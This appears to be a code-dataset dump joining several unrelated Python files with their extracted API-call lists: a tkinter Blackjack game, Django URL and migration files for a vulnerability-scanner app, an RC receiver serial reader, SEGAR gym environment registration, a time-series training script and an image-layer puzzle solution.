self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.naslednjaRoka()
if __name__ == '__main__':
root = tkinter.Tk()
root.title('Blackjack')
app = Blackjack(root)
root.mainloop()
| [
"tkinter.Menu",
"math.ceil",
"random.shuffle",
"tkinter.Button",
"tkinter.Canvas",
"tkinter.Tk",
"tkinter.Label",
"tkinter.PhotoImage"
] | [((31798, 31810), 'tkinter.Tk', 'tkinter.Tk', ([], {}), '()\n', (31808, 31810), False, 'import tkinter\n'), ((115, 135), 'tkinter.Menu', 'tkinter.Menu', (['master'], {}), '(master)\n', (127, 135), False, 'import tkinter\n'), ((185, 209), 'tkinter.Menu', 'tkinter.Menu', (['glavniMenu'], {}), '(glavniMenu)\n', (197, 209), False, 'import tkinter\n'), ((452, 509), 'tkinter.Canvas', 'tkinter.Canvas', (['master'], {'width': '(700)', 'height': '(480)', 'bg': '"""green"""'}), "(master, width=700, height=480, bg='green')\n", (466, 509), False, 'import tkinter\n'), ((2567, 2655), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player:"""', 'bg': '"""green"""', 'fg': '"""blue"""', 'font': "('Helvetica', 18, 'bold')"}), "(text='Player:', bg='green', fg='blue', font=('Helvetica', 18,\n 'bold'))\n", (2580, 2655), False, 'import tkinter\n'), ((2816, 2903), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer:"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 18, 'bold')"}), "(text='Dealer:', bg='green', fg='red', font=('Helvetica', 18,\n 'bold'))\n", (2829, 2903), False, 'import tkinter\n'), ((3086, 3159), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Credit:"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Credit:', bg='green', font=('Helvetica', 23, 'bold'))\n", (3099, 3159), False, 'import tkinter\n'), ((3348, 3426), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Current Bet:"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Current Bet:', bg='green', font=('Helvetica', 23, 'bold'))\n", (3361, 3426), False, 'import tkinter\n'), ((4133, 4211), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 24, 'bold')"}), "(text='Player Wins!', bg='green', font=('Helvetica', 24, 'bold'))\n", (4146, 4211), False, 'import tkinter\n'), ((4238, 4331), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Blackjack! 
Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 21, 'bold')"}), "(text='Blackjack! Player Wins!', bg='green', font=('Helvetica',\n 21, 'bold'))\n", (4251, 4331), False, 'import tkinter\n'), ((4349, 4442), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player Busts!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 21, 'bold')"}), "(text='Player Busts!', bg='green', fg='red', font=('Helvetica',\n 21, 'bold'))\n", (4362, 4442), False, 'import tkinter\n'), ((4464, 4556), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Delaer Wins!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Delaer Wins!', bg='green', fg='red', font=('Helvetica',\n 23, 'bold'))\n", (4477, 4556), False, 'import tkinter\n'), ((4581, 4684), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer hits Blackjack! You Lose!"""', 'bg': '"""green"""', 'font': "('Helvetica', 25, 'bold')"}), "(text='Dealer hits Blackjack! You Lose!', bg='green', font=(\n 'Helvetica', 25, 'bold'))\n", (4594, 4684), False, 'import tkinter\n'), ((4701, 4798), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer Busts! Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 25, 'bold')"}), "(text='Dealer Busts! 
Player Wins!', bg='green', font=(\n 'Helvetica', 25, 'bold'))\n", (4714, 4798), False, 'import tkinter\n'), ((4814, 4893), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""It is a Draw!"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='It is a Draw!', bg='green', font=('Helvetica', 23, 'bold'))\n", (4827, 4893), False, 'import tkinter\n'), ((4923, 5001), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Hit or Stand"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Hit or Stand', bg='green', font=('Helvetica', 23, 'bold'))\n", (4936, 5001), False, 'import tkinter\n'), ((5028, 5135), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Maximum of 5 cards reached!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 15, 'bold')"}), "(text='Maximum of 5 cards reached!', bg='green', fg='red',\n font=('Helvetica', 15, 'bold'))\n", (5041, 5135), False, 'import tkinter\n'), ((5158, 5277), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Place your bet and decide wether to Hit or Stand"""', 'bg': '"""green"""', 'font': "('Helvetica', 11, 'bold')"}), "(text='Place your bet and decide wether to Hit or Stand', bg=\n 'green', font=('Helvetica', 11, 'bold'))\n", (5171, 5277), False, 'import tkinter\n'), ((5298, 5416), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player ran out of money. Please choose new game."""', 'bg': '"""green"""', 'font': "('Helvetica', 8, 'bold')"}), "(text='Player ran out of money. 
Please choose new game.', bg=\n 'green', font=('Helvetica', 8, 'bold'))\n", (5311, 5416), False, 'import tkinter\n'), ((5459, 5529), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""HIT"""', 'command': 'self.hit', 'state': '"""disabled"""'}), "(master, text='HIT', command=self.hit, state='disabled')\n", (5473, 5529), False, 'import tkinter\n'), ((5644, 5718), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""STAND"""', 'command': 'self.stand', 'state': '"""disabled"""'}), "(master, text='STAND', command=self.stand, state='disabled')\n", (5658, 5718), False, 'import tkinter\n'), ((5835, 5904), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""Next Round"""', 'command': 'self.naslednjaRoka'}), "(master, text='Next Round', command=self.naslednjaRoka)\n", (5849, 5904), False, 'import tkinter\n'), ((5983, 6039), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$10"""', 'command': 'self.dodaj10'}), "(master, text='$10', command=self.dodaj10)\n", (5997, 6039), False, 'import tkinter\n'), ((6145, 6201), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$20"""', 'command': 'self.dodaj20'}), "(master, text='$20', command=self.dodaj20)\n", (6159, 6201), False, 'import tkinter\n'), ((6307, 6363), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$50"""', 'command': 'self.dodaj50'}), "(master, text='$50', command=self.dodaj50)\n", (6321, 6363), False, 'import tkinter\n'), ((7351, 7379), 'random.shuffle', 'random.shuffle', (['self.sezKart'], {}), '(self.sezKart)\n', (7365, 7379), False, 'import random\n'), ((7661, 7706), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaPlayer'}), '(file=self.prvaKartaPlayer)\n', (7679, 7706), False, 'import tkinter\n'), ((8196, 8242), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaPlayer'}), '(file=self.drugaKartaPlayer)\n', (8214, 8242), False, 'import tkinter\n'), ((8631, 8676), 'tkinter.PhotoImage', 
'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaDealer'}), '(file=self.prvaKartaDealer)\n', (8649, 8676), False, 'import tkinter\n'), ((9168, 9214), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaDealer'}), '(file=self.drugaKartaDealer)\n', (9186, 9214), False, 'import tkinter\n'), ((9408, 9449), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': '"""karte/back.gif"""'}), "(file='karte/back.gif')\n", (9426, 9449), False, 'import tkinter\n'), ((28835, 28863), 'random.shuffle', 'random.shuffle', (['self.sezKart'], {}), '(self.sezKart)\n', (28849, 28863), False, 'import random\n'), ((29113, 29158), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaPlayer'}), '(file=self.prvaKartaPlayer)\n', (29131, 29158), False, 'import tkinter\n'), ((29477, 29523), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaPlayer'}), '(file=self.drugaKartaPlayer)\n', (29495, 29523), False, 'import tkinter\n'), ((29880, 29925), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaDealer'}), '(file=self.prvaKartaDealer)\n', (29898, 29925), False, 'import tkinter\n'), ((30245, 30291), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaDealer'}), '(file=self.drugaKartaDealer)\n', (30263, 30291), False, 'import tkinter\n'), ((30485, 30526), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': '"""karte/back.gif"""'}), "(file='karte/back.gif')\n", (30503, 30526), False, 'import tkinter\n'), ((14668, 14738), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.sezKartIgralec[self.indexIgralceveKarte]'}), '(file=self.sezKartIgralec[self.indexIgralceveKarte])\n', (14686, 14738), False, 'import tkinter\n'), ((18943, 19013), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.sezKartDealer[self.indexDealerjeveKarte]'}), '(file=self.sezKartDealer[self.indexDealerjeveKarte])\n', (18961, 19013), False, 'import tkinter\n'), ((24211, 24243), 'math.ceil', 
'math.ceil', (['(0.5 * self.vsotaStave)'], {}), '(0.5 * self.vsotaStave)\n', (24220, 24243), False, 'import math\n')] |
from django.urls import path
from datahub.investment.summary.views import IProjectSummaryView
urlpatterns = [
path(
'adviser/<uuid:adviser_pk>/investment-summary',
IProjectSummaryView.as_view(),
name='investment-summary-item',
),
]
| [
"datahub.investment.summary.views.IProjectSummaryView.as_view"
] | [((187, 216), 'datahub.investment.summary.views.IProjectSummaryView.as_view', 'IProjectSummaryView.as_view', ([], {}), '()\n', (214, 216), False, 'from datahub.investment.summary.views import IProjectSummaryView\n')] |
# Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
| [
"django.db.models.ForeignKey",
"django.db.migrations.RemoveField",
"django.db.models.TextField",
"django.db.models.CharField"
] | [((377, 449), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""exploitregister"""', 'name': '"""file_object"""'}), "(model_name='exploitregister', name='file_object')\n", (399, 449), False, 'from django.db import migrations, models\n'), ((600, 666), 'django.db.models.TextField', 'models.TextField', ([], {'db_column': '"""code"""', 'null': '(True)', 'verbose_name': '"""负载代码"""'}), "(db_column='code', null=True, verbose_name='负载代码')\n", (616, 666), False, 'from django.db import migrations, models\n'), ((799, 899), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'db_column': '"""debug_info"""', 'default': '""""""', 'null': '(True)', 'verbose_name': '"""调试信息"""'}), "(blank=True, db_column='debug_info', default='', null=True,\n verbose_name='调试信息')\n", (815, 899), False, 'from django.db import migrations, models\n'), ((1031, 1127), 'django.db.models.CharField', 'models.CharField', ([], {'db_column': '"""function_name"""', 'default': '""""""', 'max_length': '(100)', 'verbose_name': '"""函数名称"""'}), "(db_column='function_name', default='', max_length=100,\n verbose_name='函数名称')\n", (1047, 1127), False, 'from django.db import migrations, models\n'), ((1252, 1386), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""Assets.assetlist"""', 'verbose_name': '"""调试目标"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标')\n", (1269, 1386), False, 'from django.db import migrations, models\n'), ((1517, 1579), 'django.db.models.TextField', 'models.TextField', ([], {'db_column': '"""description"""', 'verbose_name': '"""负载描述"""'}), "(db_column='description', verbose_name='负载描述')\n", (1533, 1579), False, 'from django.db import migrations, models\n')] |
import datetime
import logging
import re
import serial
import sys
import termios
import threading
import time
import tty
import configuration
class RCReader(threading.Thread):
sp = None
start_called = False
chassis = None
def __init__(self, group = None, target = None, name = None,
args = (), kwargs = None, verbose = None):
threading.Thread.__init__(self, group=group, target = target, name = name,
verbose = verbose)
self.args = args
self.kwargs = kwargs
self.chassis = args[0]
self.on = True
return
def start(self):
if self.start_called:
raise RunTimeError
self.start_called = True
# Read parameter file
config = configuration.configuration("rc_receiver")
connectparams = config.load()['connect']
# Open serial port with parameters
s = serial.Serial()
s.baudrate = connectparams['baudrate']
s.port = connectparams['port']
s.timeout = connectparams['timeout']
s.open()
if s.is_open:
self.sp = s
i = 0 # Just read some lines
line = self.sp.readline()
while line and i < 10:
line = self.sp.readline()
i += 1
super(RCReader, self).start()
def cancel(self):
self.on = False
def run(self):
last_time = datetime.datetime(1970, 1, 1)
rc_use_input_time = datetime.datetime(1970, 1, 1)
send_stop = 0
last_rc = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
while self.on:
line = self.sp.readline()
m = re.match('I ([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+)', line)
if m != None:
t = datetime.datetime.utcnow()
if (t - last_time).total_seconds() > 0.05:
last_time = t
# logging.getLogger('werkzeug').error("%s: rc_receiver.run(%f, %f, %f)" % (datetime.datetime.utcnow().strftime("%H%M%S.%f"), float(m.group(1)), float(m.group(3)), float(m.group(5))))
angle = (float(m.group(1)) - 1500.0) / 5.0
throttle = (float(m.group(3)) - 1500.0) / 5.0
rc_use = float(m.group(5)) - 1500.0
if rc_use > -450 and rc_use < 450:
logging.getLogger('werkzeug').error("%s: rc_receiver.run() messed up last: %f, %f, %f, %f, %f, %f, %f, %f now %f, %f, %f, %f, %f, %f, %f, %f" %
(datetime.datetime.utcnow().strftime("%H%M%S.%f"),
last_rc[0], last_rc[1], last_rc[2], last_rc[3], last_rc[4], last_rc[5], last_rc[6], last_rc[7],
float(m.group(1)), float(m.group(2)), float(m.group(3)), float(m.group(4)), float(m.group(5)), float(m.group(6)), float(m.group(7)), float(m.group(8))))
last_rc[0] = float(m.group(1))
last_rc[1] = float(m.group(2))
last_rc[2] = float(m.group(3))
last_rc[3] = float(m.group(4))
last_rc[4] = float(m.group(5))
last_rc[5] = float(m.group(6))
last_rc[6] = float(m.group(7))
last_rc[7] = float(m.group(8))
continue
last_rc[0] = float(m.group(1))
last_rc[1] = float(m.group(2))
last_rc[2] = float(m.group(3))
last_rc[3] = float(m.group(4))
last_rc[4] = float(m.group(5))
last_rc[5] = float(m.group(6))
last_rc[6] = float(m.group(7))
last_rc[7] = float(m.group(8))
if rc_use < 0.0:
self.chassis.use_rc_input = False
rc_use_input_time = datetime.datetime(1970, 1, 1)
else:
rc_use_input_time = datetime.datetime.utcnow()
self.chassis.use_rc_input = True
if angle > 100.0:
angle = 100.0
elif angle < - 100.0:
angle = -100.0
if throttle > 100.0:
throttle = 100.0
elif throttle < -100.0:
throttle = -100.0
# print("angle: %f throttle: %f" % (angle, throttle))
radius_inf = False
if angle >= -6.0 and angle <= 6.0:
radius = float("inf")
radius_inf = True
elif angle > 1.0:
radius = self.chassis.minRadius + (self.chassis.maxRadius - self.chassis.minRadius) * (100.0 - angle) / 100.0
else:
radius = - self.chassis.minRadius - (self.chassis.maxRadius - self.chassis.minRadius) * (100.0 + angle) / 100.0
if throttle >= -5.0 and throttle <= 5.0:
throttle = 0.0
# logging.getLogger('werkzeug').error("run(%f, %f, %d, %d)" % (throttle, radius, int(radius_inf), send_stop))
if throttle != 0.0 or radius_inf == False:
send_stop = 0
self.chassis.ensureready()
self.chassis.move_velocity_radius(throttle, radius)
elif send_stop < 1:
send_stop = 1
self.chassis.ensureready()
self.chassis.move_velocity_radius(throttle, radius)
if (datetime.datetime.utcnow() - rc_use_input_time).total_seconds() > 2.0:
self.chassis.use_rc_input = False
self.sp.close()
# t = RCReader()
# t.setDaemon(True)
# t.start()
# class Getch:
# def __call__(self):
# fd = sys.stdin.fileno()
# old_settings = termios.tcgetattr(fd)
# try:
# tty.setraw(sys.stdin.fileno())
# ch = sys.stdin.read(1)
# finally:
# termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# return ch
#
#
# getch = Getch()
# c = getch().lower()
# while c != 'q':
# time.sleep(100)
| [
"datetime.datetime",
"threading.Thread.__init__",
"logging.getLogger",
"datetime.datetime.utcnow",
"re.match",
"serial.Serial",
"configuration.configuration"
] | [((370, 461), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {'group': 'group', 'target': 'target', 'name': 'name', 'verbose': 'verbose'}), '(self, group=group, target=target, name=name,\n verbose=verbose)\n', (395, 461), False, 'import threading\n'), ((787, 829), 'configuration.configuration', 'configuration.configuration', (['"""rc_receiver"""'], {}), "('rc_receiver')\n", (814, 829), False, 'import configuration\n'), ((943, 958), 'serial.Serial', 'serial.Serial', ([], {}), '()\n', (956, 958), False, 'import serial\n'), ((1501, 1530), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (1518, 1530), False, 'import datetime\n'), ((1559, 1588), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (1576, 1588), False, 'import datetime\n'), ((1751, 1875), 're.match', 're.match', (['"""I ([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+)"""', 'line'], {}), "(\n 'I ([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+)'\n , line)\n", (1759, 1875), False, 'import re\n'), ((1904, 1930), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1928, 1930), False, 'import datetime\n'), ((4049, 4078), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (4066, 4078), False, 'import datetime\n'), ((4149, 4175), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4173, 4175), False, 'import datetime\n'), ((5949, 5975), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (5973, 5975), False, 'import datetime\n'), ((2494, 2523), 'logging.getLogger', 'logging.getLogger', (['"""werkzeug"""'], {}), "('werkzeug')\n", (2511, 2523), False, 'import logging\n'), ((2668, 2694), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2692, 2694), False, 
'import datetime\n')] |
__copyright__ = "Copyright (c) Microsoft Corporation and Mila - Quebec AI Institute"
__license__ = "MIT"
import os
import pickle
import time
from typing import Callable
import warnings
from gym import register
_SIM = None
ASSET_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "resources")
def get_sim():
"""Gets the sim, if set.
:return: the simulator.
"""
if _SIM is None:
raise RuntimeError("Simulator not set yet")
return _SIM
def set_sim(sim):
global _SIM
if _SIM is not None:
warnings.warn(
"Overwriting sim. This can have unexpected "
"consequences if using old sim objects somewhere."
)
_SIM = sim
def timeit(fn: Callable):
def timed_fn(*args, **kwargs):
t0 = time.time()
out = fn(*args, **kwargs)
t1 = time.time()
if _SIM is not None:
if len(args) > 0:
key = f"{args[0].__class__.__name__}.{fn.__name__}_time"
else:
key = f"{fn.__name__}_time"
_SIM.update_results(key, t1 - t0)
return out
return timed_fn
def load_sim_from_file(path):
"""Loads a simulator from file.
This uses pickle, so the simulator loaded will have its associated code
intact. This can make the loaded sim incompatible with newer code.
:param path: Path to pickle file.
:return: Simulator.
"""
with open(path, "rb") as f:
sim = pickle.load(f)
set_sim(sim)
return sim
# The following block of code pre-registers a set of default configurations
# that can be used via env = gym.make('empty-easy-rgb') for example.
task_names = ["empty", "objects", "tiles"]
difficulties = ["easy", "medium", "hard"]
observations = ["rgb"]
task_classes = [("v0", "PuttPutt"), ("v1", "PuttPuttNegDist")]
for task_version, task_class in task_classes:
for task in task_names:
for difficulty in difficulties:
for observation in observations:
for n_entities in [1, 2, 3]:
if task == "empty" and n_entities == 1:
env_name = f"Segar-{task}-{difficulty}-{observation}-{task_version}"
# print(env_name)
register(
id=env_name,
entry_point="segar.envs:SEGARSingleEnv",
kwargs={
"env_name": f"{task}-{difficulty}-{observation}",
"task_class": task_class,
},
max_episode_steps=100,
)
elif task != "empty":
env_name = (
f"Segar-{task}x{n_entities}-{difficulty}-"
f"{observation}-{task_version}"
)
# print(env_name)
register(
id=env_name,
entry_point="segar.envs:SEGARSingleEnv",
kwargs={
"env_name": f"{task}x{n_entities}-{difficulty}-" f"{observation}",
"task_class": task_class,
},
max_episode_steps=100,
)
# Current Envs (update as needed)
# Segar-empty-easy-rgb-v0
# Segar-empty-medium-rgb-v0
# Segar-empty-hard-rgb-v0
# Segar-objectsx1-easy-rgb-v0
# Segar-objectsx2-easy-rgb-v0
# Segar-objectsx3-easy-rgb-v0
# Segar-objectsx1-medium-rgb-v0
# Segar-objectsx2-medium-rgb-v0
# Segar-objectsx3-medium-rgb-v0
# Segar-objectsx1-hard-rgb-v0
# Segar-objectsx2-hard-rgb-v0
# Segar-objectsx3-hard-rgb-v0
# Segar-tilesx1-easy-rgb-v0
# Segar-tilesx2-easy-rgb-v0
# Segar-tilesx3-easy-rgb-v0
# Segar-tilesx1-medium-rgb-v0
# Segar-tilesx2-medium-rgb-v0
# Segar-tilesx3-medium-rgb-v0
# Segar-tilesx1-hard-rgb-v0
# Segar-tilesx2-hard-rgb-v0
# Segar-tilesx3-hard-rgb-v0
# Segar-empty-easy-rgb-v1
# Segar-empty-medium-rgb-v1
# Segar-empty-hard-rgb-v1
# Segar-objectsx1-easy-rgb-v1
# Segar-objectsx2-easy-rgb-v1
# Segar-objectsx3-easy-rgb-v1
# Segar-objectsx1-medium-rgb-v1
# Segar-objectsx2-medium-rgb-v1
# Segar-objectsx3-medium-rgb-v1
# Segar-objectsx1-hard-rgb-v1
# Segar-objectsx2-hard-rgb-v1
# Segar-objectsx3-hard-rgb-v1
# Segar-tilesx1-easy-rgb-v1
# Segar-tilesx2-easy-rgb-v1
# Segar-tilesx3-easy-rgb-v1
# Segar-tilesx1-medium-rgb-v1
# Segar-tilesx2-medium-rgb-v1
# Segar-tilesx3-medium-rgb-v1
# Segar-tilesx1-hard-rgb-v1
# Segar-tilesx2-hard-rgb-v1
# Segar-tilesx3-hard-rgb-v1
| [
"gym.register",
"pickle.load",
"os.path.realpath",
"warnings.warn",
"time.time"
] | [((266, 292), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (282, 292), False, 'import os\n'), ((555, 672), 'warnings.warn', 'warnings.warn', (['"""Overwriting sim. This can have unexpected consequences if using old sim objects somewhere."""'], {}), "(\n 'Overwriting sim. This can have unexpected consequences if using old sim objects somewhere.'\n )\n", (568, 672), False, 'import warnings\n'), ((791, 802), 'time.time', 'time.time', ([], {}), '()\n', (800, 802), False, 'import time\n'), ((850, 861), 'time.time', 'time.time', ([], {}), '()\n', (859, 861), False, 'import time\n'), ((1474, 1488), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1485, 1488), False, 'import pickle\n'), ((2264, 2443), 'gym.register', 'register', ([], {'id': 'env_name', 'entry_point': '"""segar.envs:SEGARSingleEnv"""', 'kwargs': "{'env_name': f'{task}-{difficulty}-{observation}', 'task_class': task_class}", 'max_episode_steps': '(100)'}), "(id=env_name, entry_point='segar.envs:SEGARSingleEnv', kwargs={\n 'env_name': f'{task}-{difficulty}-{observation}', 'task_class':\n task_class}, max_episode_steps=100)\n", (2272, 2443), False, 'from gym import register\n'), ((2971, 3163), 'gym.register', 'register', ([], {'id': 'env_name', 'entry_point': '"""segar.envs:SEGARSingleEnv"""', 'kwargs': "{'env_name': f'{task}x{n_entities}-{difficulty}-{observation}',\n 'task_class': task_class}", 'max_episode_steps': '(100)'}), "(id=env_name, entry_point='segar.envs:SEGARSingleEnv', kwargs={\n 'env_name': f'{task}x{n_entities}-{difficulty}-{observation}',\n 'task_class': task_class}, max_episode_steps=100)\n", (2979, 3163), False, 'from gym import register\n')] |
#!/usr/bin/python 3.7
#-*-coding:utf-8-*-
from torch import nn
import argparse
from progressbar import *
from torch.optim import Adam
import pandas as pd
import numpy as np
from my_tsp.datasets import data_processing
from my_tsp.trainer import train
def main(args):
# 读取数据
data_path = '../data/2-2.csv'
dSet = pd.read_csv(data_path)[['InternalVol', 'InternalIR']].values
print("dSet.shape", dSet.shape)
Data_utils = data_processing.Data_utility(dSet, args.num_obs_to_train, args.predict_seq_len,
args.horizon, args.normalize, args.use_split, args.use_cuda)
# Data = Data_utility(dSet, 0.6, 0.2, args.cuda, args.horizon, args.window, args.normalize);
# 数据归一化
data_scaler = Data_utils.data_normalize(Data_utils.dataset)
# 分割训练集和测试集
# if args.use_split:
Data_utils.train_test_split(Data_utils.dataset)
# 训练
train(args, Data_utils)
# print(Data.rse)
# train(Data, args)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='',
help='location of the data file')
parser.add_argument('--horizon', type=int, default=0, help='取训练序列标签时,往后延 horizon 个单位开始取')
parser.add_argument('--normalize', type=str, default='max', help='数据归一化的方式')
parser.add_argument('--model', type=str, default='tpaLSTM', help='')
parser.add_argument('--L1Loss', type=bool, default=False)
parser.add_argument('--save', type=str, default='../model_checkpoints/bt_model.pt',
help='path to save the final model')
parser.add_argument("--num_epoches", "-e", type=int, default=100)
parser.add_argument("--step_per_epoch", "-spe", type=int, default=100)
parser.add_argument("-lr", type=float, default=1e-3)
parser.add_argument("--n_layers", "-nl", type=int, default=1)
parser.add_argument("--hidden_size", "-hs", type=int, default=24)
parser.add_argument('--use_split', type=bool, default=True)
parser.add_argument('--use_cuda', type=bool, default=False)
parser.add_argument("--predict_seq_len", "-psl", type=int, default=720) # 预测未来5天,,144*5
parser.add_argument("--num_obs_to_train", "-not", type=int, default=144*30) # 单个训练序列的长度
parser.add_argument("--num_results_to_sample", "-nrs", type=int, default=10)
parser.add_argument("--show_plot", "-sp", action="store_true")
parser.add_argument("--batch_size", "-b", type=int, default=64)
args = parser.parse_args()
main(args=args)
| [
"my_tsp.trainer.train",
"my_tsp.datasets.data_processing.Data_utility",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((440, 590), 'my_tsp.datasets.data_processing.Data_utility', 'data_processing.Data_utility', (['dSet', 'args.num_obs_to_train', 'args.predict_seq_len', 'args.horizon', 'args.normalize', 'args.use_split', 'args.use_cuda'], {}), '(dSet, args.num_obs_to_train, args.\n predict_seq_len, args.horizon, args.normalize, args.use_split, args.\n use_cuda)\n', (468, 590), False, 'from my_tsp.datasets import data_processing\n'), ((907, 930), 'my_tsp.trainer.train', 'train', (['args', 'Data_utils'], {}), '(args, Data_utils)\n', (912, 930), False, 'from my_tsp.trainer import train\n'), ((1024, 1049), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1047, 1049), False, 'import argparse\n'), ((325, 347), 'pandas.read_csv', 'pd.read_csv', (['data_path'], {}), '(data_path)\n', (336, 347), True, 'import pandas as pd\n')] |
import numpy as np
import matplotlib.pyplot as plt
with open('input.txt', 'r') as f:
stream = f.readline()
image = np.array(tuple(map(int, stream))).reshape(-1, 6, 25)
nonzero_counts = np.sum(np.count_nonzero(image, axis=2), axis=1)
fewest_zeros_layer = np.argsort(nonzero_counts)[-1]
unique_values, counts = np.unique(image[fewest_zeros_layer], return_counts=True)
value_counts = dict(zip(unique_values, counts))
output_image = np.zeros((6, 25))
image -= 2
for layer in image:
output_image = np.where(output_image != 0, output_image, layer)
print(f'{(value_counts[1] * value_counts[2])=}')
plt.imshow(output_image)
plt.show()
| [
"matplotlib.pyplot.imshow",
"numpy.unique",
"numpy.where",
"numpy.count_nonzero",
"numpy.argsort",
"numpy.zeros",
"matplotlib.pyplot.show"
